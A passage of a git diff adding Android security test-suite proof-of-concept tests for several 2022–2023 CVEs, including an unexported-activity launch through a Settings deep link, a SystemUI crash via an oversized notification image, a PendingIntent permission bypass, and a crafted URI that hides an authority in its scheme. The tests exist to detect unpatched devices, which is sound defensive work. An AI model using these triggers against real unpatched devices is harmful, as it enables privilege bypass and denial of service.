+package android.security.cts.CVE_2022_20429;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import android.app.Activity;
+import android.bluetooth.BluetoothAdapter;
+import android.bluetooth.BluetoothManager;
+import android.content.Intent;
+import android.content.res.Resources;
+import android.security.cts.R;
+import android.support.test.uiautomator.By;
+import android.support.test.uiautomator.BySelector;
+import android.support.test.uiautomator.UiDevice;
+import android.support.test.uiautomator.UiObject2;
+import android.support.test.uiautomator.Until;
+
+import java.util.regex.Pattern;
+
+public class PocActivity extends Activity {
+
+    int getInteger(int resId) {
+        return getResources().getInteger(resId);
+    }
+
+    @Override
+    protected void onResume() {
+        super.onResume();
+        try {
+            String action = getIntent().getStringExtra(getString(R.string.cve_2022_20429_btAction));
+            int code = getInteger(R.integer.cve_2022_20429_enable);
+            if (action.equals(BluetoothAdapter.ACTION_REQUEST_DISABLE)) {
+                code = getInteger(R.integer.cve_2022_20429_disable);
+            }
+            BluetoothManager bluetoothManager = getSystemService(BluetoothManager.class);
+            BluetoothAdapter bluetoothAdapter = bluetoothManager.getAdapter();
+            if ((action.equals(BluetoothAdapter.ACTION_REQUEST_ENABLE)
+                            && !bluetoothAdapter.isEnabled())
+                    || (action.equals(BluetoothAdapter.ACTION_REQUEST_DISABLE)
+                            && bluetoothAdapter.isEnabled())) {
+                Intent btIntent = new Intent(action);
+                startActivityForResult(btIntent, code);
+
+                // Wait for the 'Allow' button
+                String settingsPackageName =
+                        getString(R.string.cve_2022_20429_carSettingsPackageName);
+                Resources settingsRes =
+                        getPackageManager().getResourcesForApplication(settingsPackageName);
+                int resIdentifier =
+                        settingsRes.getIdentifier(
+                                getString(R.string.cve_2022_20429_allowButtonResKey),
+                                getString(R.string.cve_2022_20429_resType),
+                                settingsPackageName);
+                String allowButtonText = settingsRes.getString(resIdentifier);
+                Pattern textPattern = Pattern.compile(allowButtonText, Pattern.CASE_INSENSITIVE);
+                BySelector selector = By.text(textPattern);
+                UiDevice uiDevice = UiDevice.getInstance(getInstrumentation());
+                uiDevice.wait(
+                        Until.hasObject(selector), getInteger(R.integer.cve_2022_20429_timeoutMs));
+
+                // Click on the 'Allow' button to enable bluetooth as required by test
+                UiObject2 uiObject = uiDevice.findObject(selector);
+                uiObject.click();
+            } else {
+                sendTestResult(getInteger(R.integer.cve_2022_20429_success), "");
+            }
+        } catch (Exception e) {
+            sendTestResult(getInteger(R.integer.cve_2022_20429_failure), e.getMessage());
+        }
+    }
+
+    @Override
+    protected void onActivityResult(int requestCode, int resultCode, Intent data) {
+        try {
+            if (requestCode == getInteger(R.integer.cve_2022_20429_enable)
+                    && resultCode == Activity.RESULT_OK) {
+                sendTestResult(getInteger(R.integer.cve_2022_20429_enable), "");
+            } else if (requestCode == getInteger(R.integer.cve_2022_20429_disable)
+                    && resultCode == Activity.RESULT_OK) {
+                sendTestResult(getInteger(R.integer.cve_2022_20429_disable), "");
+            }
+        } catch (Exception e) {
+            // Ignore exception here
+        }
+    }
+
+    void sendTestResult(int result, String message) {
+        try {
+            Intent intent = new Intent(getString(R.string.cve_2022_20429_broadcastAction));
+            intent.putExtra(getString(R.string.cve_2022_20429_resultKey), result);
+            intent.putExtra(getString(R.string.cve_2022_20429_messageKey), message);
+            sendBroadcast(intent);
+            finish();
+        } catch (Exception e) {
+            // Ignore exception here
+        }
+    }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2023_20916/CVE_2023_20916.java b/tests/tests/security/src/android/security/cts/CVE_2023_20916/CVE_2023_20916.java
new file mode 100644
index 0000000..6536e8a
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2023_20916/CVE_2023_20916.java
@@ -0,0 +1,116 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_20916;
+
+import static androidx.test.core.app.ApplicationProvider.getApplicationContext;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeFalse;
+import static org.junit.Assume.assumeNoException;
+
+import android.app.PendingIntent;
+import android.content.BroadcastReceiver;
+import android.content.ComponentName;
+import android.content.Context;
+import android.content.Intent;
+import android.content.IntentFilter;
+import android.content.pm.LauncherApps;
+import android.content.pm.PackageManager;
+import android.os.Bundle;
+import android.os.Process;
+import android.os.UserHandle;
+import android.platform.test.annotations.AsbSecurityTest;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.lang.reflect.Method;
+import java.util.concurrent.Semaphore;
+import java.util.concurrent.TimeUnit;
+
+@RunWith(AndroidJUnit4.class)
+public class CVE_2023_20916 extends StsExtraBusinessLogicTestCase {
+    private static final long TIMEOUT_MS = 10_000L;
+
+    // b/229256049
+    // Vulnerable library : services.jar, framework.jar
+    // Vulnerable module  : Not applicable
+    // Is Play managed    : No
+    @AsbSecurityTest(cveBugId = 229256049)
+    @Test
+    public void testPocCVE_2023_20916() {
+        try {
+            // Ensure that the test app does not have the ACCESS_SHORTCUTS permission
+            Context context = getApplicationContext();
+            assumeFalse("The test requires the app to not have the ACCESS_SHORTCUTS permission",
+                    context.checkPermission(android.Manifest.permission.ACCESS_SHORTCUTS,
+                    Process.myPid(), Process.myUid()) == PackageManager.PERMISSION_GRANTED);
+
+            // Make a call to the vulnerable function getMainActivityLaunchIntent()
+            Method method = LauncherApps.class.getMethod("getMainActivityLaunchIntent",
+                    ComponentName.class, Bundle.class, UserHandle.class);
+            PendingIntent pi =
+                    (PendingIntent) method.invoke(context.getSystemService(LauncherApps.class),
+                            new ComponentName(context, PocActivity.class), null,
+                            UserHandle.getUserHandleForUid(Process.myUid()));
+
+            // Register a broadcast receiver to receive broadcast from PocActivity indicating
+            // presence of vulnerability
+            final Semaphore broadcastReceived = new Semaphore(0);
+            final String bcastAction = "CVE_2023_20916_action";
+            BroadcastReceiver broadcastReceiver = new BroadcastReceiver() {
+                @Override
+                public void onReceive(Context context, Intent intent) {
+                    try {
+                        if (intent.getAction().equals(bcastAction)) {
+                            broadcastReceived.release();
+                        }
+                    } catch (Exception ignored) {
+                        // ignore any exceptions
+                    }
+                }
+            };
+            IntentFilter filter = new IntentFilter(bcastAction);
+            context.registerReceiver(broadcastReceiver, filter);
+
+            // Attempt to launch the PocActivity using the pending intent received by calling
+            // getMainActivityLaunchIntent()
+            context.startIntentSender(pi.getIntentSender(), null, 0, 0, 0, null);
+
+            // On vulnerable device, PocActivity is successfully launched using
+            // LauncherAppsService#getActivityLaunchIntent and sends a broadcast, if it is received
+            // successfully, the test fails.
+            assertFalse("Device is vulnerable to b/229256049 !!",
+                    broadcastReceived.tryAcquire(TIMEOUT_MS, TimeUnit.MILLISECONDS));
+        } catch (Exception e) {
+            try {
+                if (e.getCause() instanceof SecurityException && e.getCause().getMessage()
+                        .contains("Caller can't access shortcut information")) {
+                    // this exception is thrown with fix so ignoring it
+                    return;
+                }
+            } catch (Exception ignored) {
+                // ignore any exceptions
+            }
+            assumeNoException(e);
+        }
+    }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2023_20916/PocActivity.java b/tests/tests/security/src/android/security/cts/CVE_2023_20916/PocActivity.java
new file mode 100644
index 0000000..4953c20
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2023_20916/PocActivity.java
@@ -0,0 +1,37 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_20916;
+
+import android.app.Activity;
+import android.content.Intent;
+import android.os.Bundle;
+
+public class PocActivity extends Activity {
+
+    @Override
+    protected void onCreate(Bundle savedInstanceState) {
+        try {
+            super.onCreate(savedInstanceState);
+
+            // PocActivity has been launched successfully, this indicates presence of vulnerability
+            // so broadcasting it to DeviceTest.
+            sendBroadcast(new Intent("CVE_2023_20916_action"));
+        } catch (Exception ignored) {
+            // ignore any exceptions
+        }
+    }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2023_20927.java b/tests/tests/security/src/android/security/cts/CVE_2023_20927.java
new file mode 100644
index 0000000..8b9f494
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2023_20927.java
@@ -0,0 +1,90 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static androidx.test.core.app.ApplicationProvider.getApplicationContext;
+
+import static org.junit.Assert.assertTrue;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.content.Context;
+import android.content.pm.PackageInfo;
+import android.content.pm.PackageManager;
+import android.content.pm.PermissionInfo;
+import android.platform.test.annotations.AsbSecurityTest;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.ArrayList;
+import java.util.List;
+
+@RunWith(AndroidJUnit4.class)
+public class CVE_2023_20927 extends StsExtraBusinessLogicTestCase {
+
+    @AsbSecurityTest(cveBugId = 244216503)
+    @Test
+    public void testPocCVE_2023_20927() {
+        try {
+            Context context = getApplicationContext();
+            PackageManager pm = context.getPackageManager();
+
+            // Skip test for non-automotive builds
+            assumeTrue(
+                    "Skipping test: " + PackageManager.FEATURE_AUTOMOTIVE + " missing",
+                    pm.hasSystemFeature(PackageManager.FEATURE_AUTOMOTIVE));
+
+            // Permissions added in com.android.car package as a part of the fix
+            List<String> missingPermissions = new ArrayList<String>();
+            missingPermissions.add("android.car.permission.BIND_PROJECTION_SERVICE");
+            missingPermissions.add("android.car.permission.BIND_VMS_CLIENT");
+            missingPermissions.add(
+                    "android.car.permission.BIND_INSTRUMENT_CLUSTER_RENDERER_SERVICE");
+            missingPermissions.add("android.car.permission.BIND_CAR_INPUT_SERVICE");
+
+            // Fetch the permission of com.android.car package
+            final String pkgName = "com.android.car";
+            PackageInfo info = pm.getPackageInfo(pkgName, PackageManager.GET_PERMISSIONS);
+            assumeTrue(
+                    "Package info for " + pkgName + " not fetched properly!! ",
+                    info.packageName.equals(pkgName) && info.coreApp);
+            PermissionInfo[] permissionArray = info.permissions;
+            if (permissionArray != null) {
+                for (PermissionInfo perm : permissionArray) {
+                    if (missingPermissions.contains(perm.name)) {
+                        missingPermissions.remove(perm.name);
+                    }
+                }
+            }
+
+            // Fail if any of the 4 permissions is missing
+            assertTrue(
+                    "Vulnerable to b/244216503!"
+                            + missingPermissions.toString()
+                            + " missing in"
+                            + " CarService.apk",
+                    missingPermissions.size() == 0);
+        } catch (Exception e) {
+            assumeNoException(e);
+        }
+    }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2023_20960.java b/tests/tests/security/src/android/security/cts/CVE_2023_20960.java
new file mode 100644
index 0000000..88d6e69
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2023_20960.java
@@ -0,0 +1,129 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+
+import android.app.Instrumentation;
+import android.app.UiAutomation;
+import android.content.Context;
+import android.content.Intent;
+import android.content.pm.PackageManager;
+import android.content.pm.ResolveInfo;
+import android.os.UserHandle;
+import android.platform.test.annotations.AsbSecurityTest;
+import android.provider.Settings;
+import android.support.test.uiautomator.UiDevice;
+
+import androidx.test.platform.app.InstrumentationRegistry;
+import androidx.test.runner.AndroidJUnit4;
+
+import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.regex.Pattern;
+
+@RunWith(AndroidJUnit4.class)
+public class CVE_2023_20960 extends StsExtraBusinessLogicTestCase {
+
+    @AsbSecurityTest(cveBugId = 250589026)
+    @Test
+    public void testPocCVE_2023_20960() {
+        UiAutomation uiAutomation = null;
+        UiDevice uiDevice = null;
+        try {
+            Instrumentation instrumentation = InstrumentationRegistry.getInstrumentation();
+            uiAutomation = instrumentation.getUiAutomation();
+            uiDevice = UiDevice.getInstance(instrumentation);
+            Context context = instrumentation.getContext();
+            final String installCaCertificateWarningActivity =
+                    context.getString(R.string.cve_2023_20960_unexportedActivity);
+            String settingsPackageName =
+                    context.getString(R.string.cve_2023_20960_settingsPackageName);
+
+            // Retrieve Settings app's package name
+            ResolveInfo info =
+                    context.getPackageManager()
+                            .resolveActivityAsUser(
+                                    new Intent(Settings.ACTION_SETTINGS),
+                                    PackageManager.MATCH_SYSTEM_ONLY,
+                                    UserHandle.USER_SYSTEM);
+            if (info != null && info.activityInfo != null) {
+                settingsPackageName = info.activityInfo.packageName;
+            }
+
+            // Attempt to launch unexported Activity using Settings app
+            uiAutomation.adoptShellPermissionIdentity(
+                    android.Manifest.permission.LAUNCH_MULTI_PANE_SETTINGS_DEEP_LINK,
+                    android.Manifest.permission.INTERACT_ACROSS_USERS);
+            context.startActivity(
+                    new Intent(Settings.ACTION_SETTINGS_EMBED_DEEP_LINK_ACTIVITY)
+                            .putExtra(
+                                    Settings.EXTRA_SETTINGS_EMBEDDED_DEEP_LINK_INTENT_URI,
+                                    context.getString(R.string.cve_2023_20960_uriStringIntent)
+                                            + context.getString(
+                                                    R.string.cve_2023_20960_uriStringComponent)
+                                            + settingsPackageName
+                                            + context.getString(
+                                                    R.string.cve_2023_20960_forwardSlash)
+                                            + installCaCertificateWarningActivity
+                                            + context.getString(
+                                                    R.string.cve_2023_20960_uriStringSuffix))
+                            .addFlags(Intent.FLAG_ACTIVITY_NEW_TASK));
+
+            // Check if unexported activity 'InstallCaCertificateWarning' is launched
+            String activityDump =
+                    uiDevice.executeShellCommand(
+                            context.getString(
+                                    R.string.cve_2023_20960_dumpsysActivityCmd,
+                                    settingsPackageName + installCaCertificateWarningActivity));
+
+            Pattern resumedTruePattern =
+                    Pattern.compile(
+                            context.getString(R.string.cve_2023_20960_mResumedTruePattern),
+                            Pattern.CASE_INSENSITIVE);
+
+            // Wait for dumpsys result to update
+            int iteration = 0;
+            while (!resumedTruePattern.matcher(activityDump).find() && iteration <= 5) {
+                Thread.sleep(100);
+                activityDump =
+                        uiDevice.executeShellCommand(
+                                context.getString(
+                                        R.string.cve_2023_20960_dumpsysActivityCmd,
+                                        settingsPackageName + installCaCertificateWarningActivity));
+                iteration++;
+            }
+
+            assertFalse(
+                    context.getString(R.string.cve_2023_20960_failMsg),
+                    resumedTruePattern.matcher(activityDump).find());
+        } catch (Exception e) {
+            assumeNoException(e);
+        } finally {
+            try {
+                uiAutomation.dropShellPermissionIdentity();
+                uiDevice.pressHome();
+            } catch (Exception e) {
+                // Ignore exceptions as the test has finished
+            }
+        }
+    }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2023_21143.java b/tests/tests/security/src/android/security/cts/CVE_2023_21143.java
new file mode 100644
index 0000000..756782b
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2023_21143.java
@@ -0,0 +1,131 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static com.android.sts.common.SystemUtil.poll;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.Instrumentation;
+import android.app.Notification;
+import android.app.NotificationChannel;
+import android.app.NotificationManager;
+import android.content.Context;
+import android.graphics.drawable.Icon;
+import android.platform.test.annotations.AsbSecurityTest;
+import android.service.notification.StatusBarNotification;
+import android.widget.RemoteViews;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import com.android.compatibility.common.util.SystemUtil;
+import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(AndroidJUnit4.class)
+public class CVE_2023_21143 extends StsExtraBusinessLogicTestCase {
+    private Instrumentation mInstrumentation = null;
+
+    @Test
+    @AsbSecurityTest(cveBugId = 268193777)
+    public void testPocCVE_2023_21143() {
+        Context context = null;
+        try {
+            mInstrumentation = getInstrumentation();
+            context = mInstrumentation.getContext();
+
+            // Getting pid of com.android.systemui
+            final String systemuiPidCommand = context.getString(R.string.systemuiPidCommand);
+            final int initialPidOfSystemUI = getPid(systemuiPidCommand);
+            assumeTrue(context.getString(R.string.noPidFound), initialPidOfSystemUI != -1);
+
+            // Adding a remoteview with large size image to notification in order to reproduce the
+            // vulnerability
+            final String packageName = context.getPackageName();
+            RemoteViews remoteView = new RemoteViews(packageName, R.layout.cve_2023_21143);
+            NotificationChannel channel =
+                    new NotificationChannel(
+                            context.getString(R.string.channelId),
+                            context.getString(R.string.channelName),
+                            NotificationManager.IMPORTANCE_HIGH);
+            NotificationManager notificationManager =
+                    context.getSystemService(NotificationManager.class);
+            notificationManager.createNotificationChannel(channel);
+            Notification notification =
+                    new Notification.Builder(context, context.getString(R.string.channelId))
+                            .setContentText(context.getString(R.string.notificationText))
+                            .setSmallIcon(Icon.createWithData(new byte[0], 0, 0))
+                            .setCustomContentView(remoteView)
+                            .build();
+            notificationManager.notify(1, notification);
+
+            // Assumption failure if notification has not been posted successfully.
+            assumeTrue(
+                    context.getString(R.string.notificationSendingFailed),
+                    poll(
+                            () -> {
+                                for (StatusBarNotification sbn :
+                                        notificationManager.getActiveNotifications()) {
+                                    if (sbn.getPackageName().equals(packageName)) {
+                                        return true;
+                                    }
+                                }
+                                return false;
+                            }));
+
+            // Without fix, the systemui crashes and it's pid changes.
+            // Fail test only if pid has changed and notification is still visible.
+            boolean isDeviceVulnerable = false;
+            if (poll(() -> getPid(systemuiPidCommand) != initialPidOfSystemUI)) {
+                for (StatusBarNotification sbn : notificationManager.getActiveNotifications()) {
+                    isDeviceVulnerable = sbn.getPackageName().equals(context.getPackageName());
+                    if (isDeviceVulnerable) {
+                        break;
+                    }
+                }
+            }
+            assertFalse(context.getString(R.string.failMsg), isDeviceVulnerable);
+        } catch (Exception e) {
+            assumeNoException(e);
+        } finally {
+            try {
+                // In case of without fix, a crash window stays.
+                SystemUtil.runShellCommand(
+                        mInstrumentation, context.getString(R.string.shellCommandForHome));
+            } catch (Exception ignore) {
+                // ignore
+            }
+        }
+    }
+
+    private int getPid(String commandToFindPid) {
+        try {
+            // Getting pid of com.android.systemui
+            return Integer.parseInt(
+                    SystemUtil.runShellCommand(mInstrumentation, commandToFindPid).trim());
+        } catch (Exception e) {
+            // ignore and return -1
+            return -1;
+        }
+    }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2023_21246.java b/tests/tests/security/src/android/security/cts/CVE_2023_21246.java
new file mode 100644
index 0000000..fd87dbd
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2023_21246.java
@@ -0,0 +1,64 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static androidx.test.core.app.ApplicationProvider.getApplicationContext;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+
+import android.content.pm.ShortcutInfo;
+import android.platform.test.annotations.AsbSecurityTest;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(AndroidJUnit4.class)
+public class CVE_2023_21246 extends StsExtraBusinessLogicTestCase {
+
+    @AsbSecurityTest(cveBugId = 273729476)
+    @Test
+    public void testPocCVE_2023_21246() {
+        try {
+            // Set shortcutIdLength = 10 * MAX_ID_LENGTH where value of MAX_ID_LENGTH is set to 1000
+            // in fix patch
+            final int shortcutIdLength = 10000;
+
+            // Create shortcutInfo object with shortcutId of length 10000
+            ShortcutInfo shortcutInfo =
+                    new ShortcutInfo.Builder(
+                                    getApplicationContext(),
+                                    new String(new char[shortcutIdLength])
+                                            .replace("\0" /* oldChar */, "A" /* newChar */))
+                            .build();
+
+            // Fail if shortcutId length is more than or equal to 10000
+            assertFalse(
+                    "Device is vulnerable to b/273729476 since length of shortcutId is more than"
+                            + " or equal to 10000 hence notification access can be persisted after"
+                            + " reboot via a malformed notification listener with super large"
+                            + " shortcutId enabled",
+                    shortcutInfo.getId().length() >= shortcutIdLength);
+        } catch (Exception e) {
+            assumeNoException(e);
+        }
+    }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2023_21283.java b/tests/tests/security/src/android/security/cts/CVE_2023_21283.java
new file mode 100644
index 0000000..dc3761d
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2023_21283.java
@@ -0,0 +1,69 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static android.provider.MediaStore.Images.Media.EXTERNAL_CONTENT_URI;
+
+import static com.google.common.truth.Truth.assertWithMessage;
+import static com.google.common.truth.TruthJUnit.assume;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.content.ContentProvider;
+import android.content.Context;
+import android.graphics.drawable.Icon;
+import android.os.UserManager;
+import android.platform.test.annotations.AsbSecurityTest;
+import android.telecom.StatusHints;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(AndroidJUnit4.class)
+public class CVE_2023_21283 extends StsExtraBusinessLogicTestCase {
+
+    @AsbSecurityTest(cveBugId = 280797684)
+    @Test
+    public void testPocCVE_2023_21283() {
+        try {
+            // Check if the device supports multiple users or not
+            Context context = getContext();
+            assume().withMessage("This device does not support multiple users")
+                    .that(context.getSystemService(UserManager.class).supportsMultipleUsers())
+                    .isTrue();
+
+            // Create StatusHints object with an icon specified by URI associated with target user.
+            int targetUserId = context.getUserId() + 1;
+            StatusHints hints =
+                    new StatusHints(
+                            "CVE_2023_21283_user",
+                            Icon.createWithContentUri(
+                                    ContentProvider.maybeAddUserId(
+                                            EXTERNAL_CONTENT_URI, targetUserId)),
+                            null);
+
+            // With fix, getIcon() returns null.
+            assertWithMessage("Vulnerable to b/280797684").that(hints.getIcon()).isNull();
+        } catch (Exception e) {
+            assumeNoException(e);
+        }
+    }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2023_40119.java b/tests/tests/security/src/android/security/cts/CVE_2023_40119.java
new file mode 100644
index 0000000..96a7f29
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2023_40119.java
@@ -0,0 +1,67 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assert.assertEquals;
+import static org.junit.Assume.assumeNoException;
+
+import android.net.Uri;
+import android.os.Parcel;
+import android.platform.test.annotations.AsbSecurityTest;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(AndroidJUnit4.class)
+public class CVE_2023_40119 extends StsExtraBusinessLogicTestCase {
+
+    @AsbSecurityTest(cveBugId = 231476072)
+    @Test
+    public void testPocCVE_2023_40119() {
+        try {
+            Parcel parcel = Parcel.obtain();
+
+            // Create an evil URI passing a scheme (that hides an unsafe authority and the ssp both)
+            // , a fake ssp and a fragment to Uri.fromParts() and write the evil URI to a parcel.
+            Uri.fromParts(
+                            "scheme://notAllowedAuthorityAndSsp" /* scheme */,
+                            "allowedAuthorityAndSsp" /* scheme-specific-part */,
+                            "fragment" /* fragment */)
+                    .writeToParcel(parcel, 0 /* No additional flags or options */);
+            parcel.setDataPosition(0);
+
+            Uri uriFromParcel = Uri.CREATOR.createFromParcel(parcel);
+
+            // Without fix, the scheme from parsing the string representation of uriFromParcel will
+            // return "scheme" as Uri parser checks for the delimiter ':' but the scheme from
+            // uriFromParcel.getScheme() will return "scheme://notAllowedAuthorityAndSsp" which
+            // hides the "not allowed" authority ("notAllowedAuthorityAndSsp") in the scheme
+            // enabling bypass of authority checks.
+            assertEquals(
+                    "Vulnerable to b/231476072 !!, URIs are not canonicalized across AIDL"
+                        + " boundaries",
+                    Uri.parse(uriFromParcel.toString()).getScheme(),
+                    uriFromParcel.getScheme());
+        } catch (Exception e) {
+            assumeNoException(e);
+        }
+    }
+}
diff --git a/tests/tests/security/src/android/security/cts/PackageSignatureTest.java b/tests/tests/security/src/android/security/cts/PackageSignatureTest.java
index 92f3706..f9ce8df 100644
--- a/tests/tests/security/src/android/security/cts/PackageSignatureTest.java
+++ b/tests/tests/security/src/android/security/cts/PackageSignatureTest.java
@@ -34,6 +34,7 @@
 import java.util.HashSet;
 import java.util.List;
 import java.util.Set;
+import java.util.TreeSet;
 import java.util.regex.Matcher;
 import java.util.regex.Pattern;
 
@@ -44,7 +45,7 @@
 
     @RestrictedBuildTest
     public void testPackageSignatures() throws Exception {
-        Set<String> badPackages = new HashSet<String>();
+        Set<String> badPackages = new TreeSet<>();
         Set<Signature> wellKnownSignatures = getWellKnownSignatures();
 
         PackageManager packageManager = mContext.getPackageManager();
@@ -77,7 +78,7 @@
      * .bin files when adding entries to this list.
      */
     private Set<Signature> getWellKnownSignatures() throws NotFoundException, IOException {
-        Set<Signature> wellKnownSignatures = new HashSet<Signature>();
+        Set<Signature> wellKnownSignatures = new HashSet<>();
         wellKnownSignatures.add(getSignature(R.raw.sig_media));
         wellKnownSignatures.add(getSignature(R.raw.sig_platform));
         wellKnownSignatures.add(getSignature(R.raw.sig_shared));
@@ -107,6 +108,83 @@
         // won't negatively affect tests to include their signatures here too.
         wellKnownSignatures.add(getSignature(R.raw.sig_com_google_android_tzdata));
         wellKnownSignatures.add(getSignature(R.raw.sig_com_google_android_tzdata2));
+        wellKnownSignatures.add(getSignature(R.raw.sig_android_telephony_cts_testkey));
+        wellKnownSignatures.add(getSignature(R.raw.sig_build_bazel_examples_apex_minimal));
+        wellKnownSignatures.add(getSignature(R.raw.sig_cert));
+        wellKnownSignatures.add(getSignature(R.raw.sig_com_android_adbd));
+        wellKnownSignatures.add(getSignature(R.raw.sig_com_android_adservices));
+        wellKnownSignatures.add(getSignature(R.raw.sig_com_android_adservices_api));
+        wellKnownSignatures.add(getSignature(R.raw.sig_com_android_appsearch));
